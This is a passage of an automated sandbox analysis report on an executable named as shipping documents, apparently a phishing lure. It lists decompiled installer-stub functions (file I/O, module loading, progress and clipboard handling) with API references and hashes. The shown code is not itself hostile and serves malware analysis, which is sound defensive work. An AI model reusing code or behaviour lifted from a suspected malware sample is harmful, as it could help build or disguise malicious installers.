                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                          • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                          • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                          • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}










                                          0x0040138a
                                          0x004013fa
                                          0x0040139b
                                          0x004013a0
                                          0x00000000
                                          0x00000000
                                          0x004013a2
                                          0x004013a3
                                          0x004013ad
                                          0x00000000
                                          0x00401404
                                          0x004013b0
                                          0x004013b7
                                          0x004013bd
                                          0x004013be
                                          0x004013c0
                                          0x004013c2
                                          0x004013b9
                                          0x004013b9
                                          0x004013ba
                                          0x004013ba
                                          0x004013c9
                                          0x004013cb
                                          0x004013f4
                                          0x004013f4
                                          0x004013c9
                                          0x00000000

                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                          • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                          • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                          • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                          0x00406639
                                          0x0040663c
                                          0x00406643
                                          0x0040664b
                                          0x00406657
                                          0x00000000
                                          0x0040665e
                                          0x0040664e
                                          0x00406655
                                          0x00000000
                                          0x00406666
                                          0x00000000

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                            • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                            • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                            • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                          • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                          • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                          • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                          0x00405dc5
                                          0x00405dd2
                                          0x00405de7
                                          0x00405ded

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00405DC5
                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                          • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                          • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                          • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                          0x00405da1
                                          0x00405da7
                                          0x00405dac
                                          0x00405db5
                                          0x00405db5
                                          0x00405dbe

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                          • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                          • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                          0x00405898
                                          0x004058a0
                                          0x00000000
                                          0x004058a6
                                          0x00000000

                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                          • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                          • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                          • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x00405e6c
                                          0x00405e7c
                                          0x00405e84
                                          0x00000000
                                          0x00405e8b
                                          0x00000000
                                          0x00405e8d

                                          APIs
                                          • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040D034,0040B8F8,0040339A,0040B8F8,0040D034,004138F8,00004000,?,00000000,004031C4,00000004), ref: 00405E7C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x00405e3d
                                          0x00405e4d
                                          0x00405e55
                                          0x00000000
                                          0x00405e5c
                                          0x00000000
                                          0x00405e5e

                                          APIs
                                          • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403416,0040A130,0040A130,0040331A,004138F8,00004000,?,00000000,004031C4), ref: 00405E4D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                          • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                          • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                          • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                          0x00403427
                                          0x0040342d

                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                          0x00405493
                                          0x0040549b
                                          0x0040549e
                                          0x004054a6
                                          0x004054a9
                                          0x00405638
                                          0x0040563e
                                          0x00405662
                                          0x00405662
                                          0x0040566e
                                          0x00405674
                                          0x00405696
                                          0x00405696
                                          0x0040569c
                                          0x004056f1
                                          0x004056f1
                                          0x004056f4
                                          0x00000000
                                          0x00000000
                                          0x004056f6
                                          0x004056f9
                                          0x004056fc
                                          0x00000000
                                          0x00000000
                                          0x00405706
                                          0x0040570c
                                          0x0040570e
                                          0x00405711
                                          0x0040580e
                                          0x00000000
                                          0x0040580e
                                          0x00405720
                                          0x0040572c
                                          0x00405735
                                          0x0040573c
                                          0x00405740
                                          0x00405743
                                          0x0040574c
                                          0x00405752
                                          0x00405755
                                          0x00405755
                                          0x00405765
                                          0x0040576b
                                          0x0040576e
                                          0x00405779
                                          0x00405779
                                          0x0040577a
                                          0x0040577d
                                          0x00405784
                                          0x0040578b
                                          0x00405793
                                          0x00405793
                                          0x004057a1
                                          0x004057a7
                                          0x004057aa
                                          0x004057aa
                                          0x004057b1
                                          0x004057b7
                                          0x004057c0
                                          0x004057c7
                                          0x004057d0
                                          0x004057d2
                                          0x004057d5
                                          0x004057e4
                                          0x004057e6
                                          0x004057e9
                                          0x004057ea
                                          0x004057ed
                                          0x004057ee
                                          0x004057ef
                                          0x004057ef
                                          0x004057f7
                                          0x00405802
                                          0x00405808
                                          0x00405808
                                          0x00000000
                                          0x0040576e
                                          0x0040569e
                                          0x004056a4
                                          0x004056d2
                                          0x004056d4
                                          0x004056da
                                          0x004056e5
                                          0x004056e5
                                          0x004056ec
                                          0x00000000
                                          0x004056ec
                                          0x004056a8
                                          0x004056b2
                                          0x00000000
                                          0x00405676
                                          0x00405676
                                          0x0040567c
                                          0x004056b7
                                          0x00000000
                                          0x004056be
                                          0x00405685
                                          0x0040568c
                                          0x00405691
                                          0x00000000
                                          0x00405691
                                          0x00405674
                                          0x004054af
                                          0x004054b3
                                          0x004054bb
                                          0x004054bf
                                          0x004054c2
                                          0x004054c5
                                          0x004054c8
                                          0x004054cb
                                          0x004054cc
                                          0x004054cd
                                          0x004054e6
                                          0x004054e9
                                          0x004054f3
                                          0x00405502
                                          0x0040550a
                                          0x00405512
                                          0x00405517
                                          0x0040551a
                                          0x00405526
                                          0x0040552f
                                          0x00405538
                                          0x0040555a
                                          0x00405560
                                          0x00405571
                                          0x00405576
                                          0x00405584
                                          0x00405592
                                          0x00405592
                                          0x00405597
                                          0x004055a5
                                          0x004055a5
                                          0x004055aa
                                          0x004055ad
                                          0x004055b2
                                          0x004055be
                                          0x004055c7
                                          0x004055d4
                                          0x004055e3
                                          0x004055d6
                                          0x004055db
                                          0x004055db
                                          0x004055ef
                                          0x004055ef
                                          0x00405603
                                          0x0040560c
                                          0x00405615
                                          0x00405625
                                          0x00405631
                                          0x00405631
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32 ref: 004054EC
                                          • GetDlgItem.USER32 ref: 004054FB
                                          • GetClientRect.USER32 ref: 00405538
                                          • GetSystemMetrics.USER32 ref: 0040553F
                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405560
                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405571
                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405584
                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405592
                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055A5
                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055C7
                                          • ShowWindow.USER32(?,00000008), ref: 004055DB
                                          • GetDlgItem.USER32 ref: 004055FC
                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040560C
                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405625
                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405631
                                          • GetDlgItem.USER32 ref: 0040550A
                                            • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                          • GetDlgItem.USER32 ref: 0040564D
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
                                          • CloseHandle.KERNEL32(00000000), ref: 00405662
                                          • ShowWindow.USER32(00000000), ref: 00405685
                                          • ShowWindow.USER32(?,00000008), ref: 0040568C
                                          • ShowWindow.USER32(00000008), ref: 004056D2
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405706
                                          • CreatePopupMenu.USER32 ref: 00405717
                                          • AppendMenuA.USER32 ref: 0040572C
                                          • GetWindowRect.USER32 ref: 0040574C
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057A1
                                          • OpenClipboard.USER32(00000000), ref: 004057B1
                                          • EmptyClipboard.USER32 ref: 004057B7
                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                          • GlobalLock.KERNEL32 ref: 004057CA
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057DE
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                          • SetClipboardData.USER32(00000001,00000000), ref: 00405802
